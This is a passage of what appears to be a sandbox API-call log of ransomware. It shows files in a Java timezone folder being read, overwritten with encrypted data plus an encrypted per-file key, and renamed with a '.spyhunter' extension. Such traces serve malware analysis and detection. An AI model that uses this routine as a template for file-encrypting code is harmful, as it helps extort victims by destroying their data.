lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0169.793] GetProcessHeap () returned 0x2c0000 [0169.793] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0169.793] GetProcessHeap () returned 0x2c0000 [0169.793] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eba9a8 | out: hHeap=0x2c0000) returned 1 [0169.794] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e600 | out: pbBuffer=0x270e600) returned 1 [0169.794] GetProcessHeap () returned 0x2c0000 [0169.794] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0169.794] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e5f8*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e5f8*=0x30) returned 1 [0169.794] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Scoresbysund" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\scoresbysund"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0169.794] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Scoresbysund") returned 64 [0169.794] StrStrW (lpFirst="Scoresbysund", lpSrch=".txt") returned 0x0 [0169.794] GetProcessHeap () returned 0x2c0000 [0169.794] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0169.794] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e5bc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270e5bc*=0x410, lpOverlapped=0x0) returned 1 [0169.828] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffbf0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0169.828] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x410, lpNumberOfBytesWritten=0x270e5bc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270e5bc*=0x410, lpOverlapped=0x0) returned 1 [0169.828] GetProcessHeap () returned 0x2c0000 [0169.828] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0169.829] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.829] WriteFile (in: hFile=0xb0, lpBuffer=0x270e5fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e5bc, lpOverlapped=0x0 | out: lpBuffer=0x270e5fc*, lpNumberOfBytesWritten=0x270e5bc*=0x4, lpOverlapped=0x0) returned 1 [0169.829] WriteFile (in: hFile=0xb0, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e5bc, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e5bc*=0x30, lpOverlapped=0x0) returned 1 [0169.829] CloseHandle (hObject=0xb0) returned 1 [0169.835] GetProcessHeap () returned 0x2c0000 [0169.835] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0169.835] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Scoresbysund.spyhunter") returned 74 [0169.835] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Scoresbysund" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\scoresbysund"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Scoresbysund.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\scoresbysund.spyhunter")) returned 1 [0169.836] GetProcessHeap () returned 0x2c0000 [0169.836] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0169.836] GetProcessHeap () returned 0x2c0000 [0169.836] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0169.836] GetProcessHeap () returned 0x2c0000 [0169.836] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e04d38 | out: hHeap=0x2c0000) returned 1 [0169.836] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e5f8 | out: pbBuffer=0x270e5f8) returned 1 [0169.836] GetProcessHeap () returned 0x2c0000 [0169.836] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0169.837] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e5f0*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e5f0*=0x30) returned 1 [0169.837] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Santa_Isabel" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\santa_isabel"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0169.837] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Santa_Isabel") returned 64 [0169.837] StrStrW (lpFirst="Santa_Isabel", lpSrch=".txt") returned 0x0 [0169.837] GetProcessHeap () returned 0x2c0000 [0169.837] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0169.837] ReadFile (in: hFile=0xb0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e5b4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270e5b4*=0x4fc, lpOverlapped=0x0) returned 1 [0169.942] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffb04, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0169.942] WriteFile (in: hFile=0xb0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x4fc, lpNumberOfBytesWritten=0x270e5b4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270e5b4*=0x4fc, lpOverlapped=0x0) returned 1 [0169.942] GetProcessHeap () returned 0x2c0000 [0169.942] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0169.942] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.943] WriteFile (in: hFile=0xb0, lpBuffer=0x270e5f4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e5b4, lpOverlapped=0x0 | out: lpBuffer=0x270e5f4*, lpNumberOfBytesWritten=0x270e5b4*=0x4, lpOverlapped=0x0) returned 1 [0169.943] WriteFile (in: hFile=0xb0, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e5b4, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e5b4*=0x30, lpOverlapped=0x0) returned 1 [0169.943] CloseHandle (hObject=0xb0) returned 1 [0169.943] GetProcessHeap () returned 0x2c0000 [0169.943] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0169.943] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Santa_Isabel.spyhunter") returned 74 [0169.943] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Santa_Isabel" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\santa_isabel"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Santa_Isabel.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\santa_isabel.spyhunter")) returned 1 [0169.943] GetProcessHeap () returned 0x2c0000 [0169.944] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0169.944] GetProcessHeap () returned 0x2c0000 [0169.944] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0169.944] GetProcessHeap () returned 0x2c0000 [0169.944] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e04b98 | out: hHeap=0x2c0000) returned 1 [0169.944] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e5f8 | out: pbBuffer=0x270e5f8) returned 1 [0169.944] GetProcessHeap () returned 0x2c0000 [0169.944] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0169.944] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e5f0*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e5f0*=0x30) returned 1 [0169.944] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Rainy_River" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\rainy_river"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0169.944] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Rainy_River") returned 63 [0169.944] StrStrW (lpFirst="Rainy_River", lpSrch=".txt") returned 0x0 [0169.944] GetProcessHeap () returned 0x2c0000 [0169.945] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0169.945] ReadFile (in: hFile=0xb0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e5b4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270e5b4*=0x478, lpOverlapped=0x0) returned 1 [0170.001] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffb88, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0170.001] WriteFile (in: hFile=0xb0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x478, lpNumberOfBytesWritten=0x270e5b4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270e5b4*=0x478, lpOverlapped=0x0) returned 1 [0170.001] GetProcessHeap () returned 0x2c0000 [0170.001] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0170.001] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0170.001] WriteFile (in: hFile=0xb0, lpBuffer=0x270e5f4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e5b4, lpOverlapped=0x0 | out: lpBuffer=0x270e5f4*, lpNumberOfBytesWritten=0x270e5b4*=0x4, lpOverlapped=0x0) returned 1 [0170.001] WriteFile (in: hFile=0xb0, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e5b4, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e5b4*=0x30, lpOverlapped=0x0) returned 1 [0170.001] CloseHandle (hObject=0xb0) returned 1 [0170.001] GetProcessHeap () returned 0x2c0000 [0170.001] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0170.001] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Rainy_River.spyhunter") returned 73 [0170.001] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Rainy_River" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\rainy_river"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Rainy_River.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\rainy_river.spyhunter")) returned 1 [0170.002] GetProcessHeap () returned 0x2c0000 [0170.002] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0170.002] GetProcessHeap () returned 0x2c0000 [0170.003] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0170.003] GetProcessHeap () returned 0x2c0000 [0170.003] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed53c0 | out: hHeap=0x2c0000) returned 1 [0170.003] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e5f0 | out: pbBuffer=0x270e5f0) returned 1 [0170.003] GetProcessHeap () returned 0x2c0000 [0170.003] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0170.003] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e5e8*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e5e8*=0x30) returned 1 [0170.003] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Puerto_Rico" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\puerto_rico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0170.004] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Puerto_Rico") returned 63 [0170.004] StrStrW (lpFirst="Puerto_Rico", lpSrch=".txt") returned 0x0 [0170.004] GetProcessHeap () returned 0x2c0000 [0170.004] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0170.004] ReadFile (in: hFile=0xb0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e5ac, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270e5ac*=0x4d, lpOverlapped=0x0) returned 1 [0170.005] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffffb3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0170.005] WriteFile (in: hFile=0xb0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x4d, lpNumberOfBytesWritten=0x270e5ac, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270e5ac*=0x4d, lpOverlapped=0x0) returned 1 [0170.005] GetProcessHeap () returned 0x2c0000 [0170.005] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0170.005] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0170.005] WriteFile (in: hFile=0xb0, lpBuffer=0x270e5ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e5ac, lpOverlapped=0x0 | out: lpBuffer=0x270e5ec*, lpNumberOfBytesWritten=0x270e5ac*=0x4, lpOverlapped=0x0) returned 1 [0170.005] WriteFile (in: hFile=0xb0, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e5ac, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e5ac*=0x30, lpOverlapped=0x0) returned 1 [0170.005] CloseHandle (hObject=0xb0) returned 1 [0170.005] GetProcessHeap () returned 0x2c0000 [0170.005] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0170.005] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Puerto_Rico.spyhunter") returned 73 [0170.005] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Puerto_Rico" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\puerto_rico"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Puerto_Rico.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\puerto_rico.spyhunter")) returned 1 [0170.007] GetProcessHeap () returned 0x2c0000 [0170.007] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0170.007] GetProcessHeap () returned 0x2c0000 [0170.007] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0170.007] GetProcessHeap () returned 0x2c0000 [0170.007] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed52f8 | out: hHeap=0x2c0000) returned 1 [0170.007] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e5f0 | out: pbBuffer=0x270e5f0) returned 1 [0170.007] GetProcessHeap () returned 0x2c0000 [0170.007] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0170.007] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e5e8*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e5e8*=0x30) returned 1 [0170.007] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Port_of_Spain" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\port_of_spain"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0170.008] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Port_of_Spain") returned 65 [0170.008] StrStrW (lpFirst="Port_of_Spain", lpSrch=".txt") returned 0x0 [0170.008] GetProcessHeap () returned 0x2c0000 [0170.008] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0170.008] ReadFile (in: hFile=0xb0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e5ac, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270e5ac*=0x41, lpOverlapped=0x0) returned 1 [0170.009] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffffbf, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0170.009] WriteFile (in: hFile=0xb0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x270e5ac, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270e5ac*=0x41, lpOverlapped=0x0) returned 1 [0170.009] GetProcessHeap () returned 0x2c0000 [0170.009] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0170.009] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0170.010] WriteFile (in: hFile=0xb0, lpBuffer=0x270e5ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e5ac, lpOverlapped=0x0 | out: lpBuffer=0x270e5ec*, lpNumberOfBytesWritten=0x270e5ac*=0x4, lpOverlapped=0x0) returned 1 [0170.010] WriteFile (in: hFile=0xb0, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e5ac, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e5ac*=0x30, lpOverlapped=0x0) returned 1 [0170.010] CloseHandle (hObject=0xb0) returned 1 [0170.010] GetProcessHeap () returned 0x2c0000 [0170.010] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0170.010] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Port_of_Spain.spyhunter") returned 75 [0170.010] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Port_of_Spain" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\port_of_spain"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Port_of_Spain.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\port_of_spain.spyhunter")) returned 1 [0170.011] GetProcessHeap () returned 0x2c0000 [0170.011] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0170.011] GetProcessHeap () returned 0x2c0000 [0170.011] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0170.011] GetProcessHeap () returned 0x2c0000 [0170.011] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e049f8 | out: hHeap=0x2c0000) returned 1 [0170.011] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e5e8 | out: pbBuffer=0x270e5e8) returned 1 [0170.011] GetProcessHeap () returned 0x2c0000 [0170.011] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0170.012] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e5e0*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e5e0*=0x30) returned 1 [0170.012] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Porto_Velho" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\porto_velho"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0170.012] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Porto_Velho") returned 63 [0170.012] StrStrW (lpFirst="Porto_Velho", lpSrch=".txt") returned 0x0 [0170.012] GetProcessHeap () returned 0x2c0000 [0170.012] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0170.013] ReadFile (in: hFile=0xb0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e5a4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270e5a4*=0x129, lpOverlapped=0x0) returned 1 [0170.013] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffed7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0170.013] WriteFile (in: hFile=0xb0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x129, lpNumberOfBytesWritten=0x270e5a4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270e5a4*=0x129, lpOverlapped=0x0) returned 1 [0170.013] GetProcessHeap () returned 0x2c0000 [0170.013] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0170.014] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0170.014] WriteFile (in: hFile=0xb0, lpBuffer=0x270e5e4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e5a4, lpOverlapped=0x0 | out: lpBuffer=0x270e5e4*, lpNumberOfBytesWritten=0x270e5a4*=0x4, lpOverlapped=0x0) returned 1 [0170.014] WriteFile (in: hFile=0xb0, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e5a4, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e5a4*=0x30, lpOverlapped=0x0) returned 1 [0170.014] CloseHandle (hObject=0xb0) returned 1 [0170.014] GetProcessHeap () returned 0x2c0000 [0170.014] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0170.014] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Porto_Velho.spyhunter") returned 73 [0170.014] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Porto_Velho" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\porto_velho"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Porto_Velho.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\porto_velho.spyhunter")) returned 1 [0170.015] GetProcessHeap () returned 0x2c0000 [0170.015] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0170.015] GetProcessHeap () returned 0x2c0000 [0170.015] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0170.015] GetProcessHeap () returned 0x2c0000 [0170.015] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed5230 | out: hHeap=0x2c0000) returned 1 [0170.015] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e5e8 | out: pbBuffer=0x270e5e8) returned 1 [0170.015] GetProcessHeap () returned 0x2c0000 [0170.015] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0170.015] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e5e0*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e5e0*=0x30) returned 1 [0170.015] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Port-au-Prince" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\port-au-prince"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0170.016] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Port-au-Prince") returned 66 [0170.016] StrStrW (lpFirst="Port-au-Prince", lpSrch=".txt") returned 0x0 [0170.016] GetProcessHeap () returned 0x2c0000 [0170.016] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0170.016] ReadFile (in: hFile=0xb0, 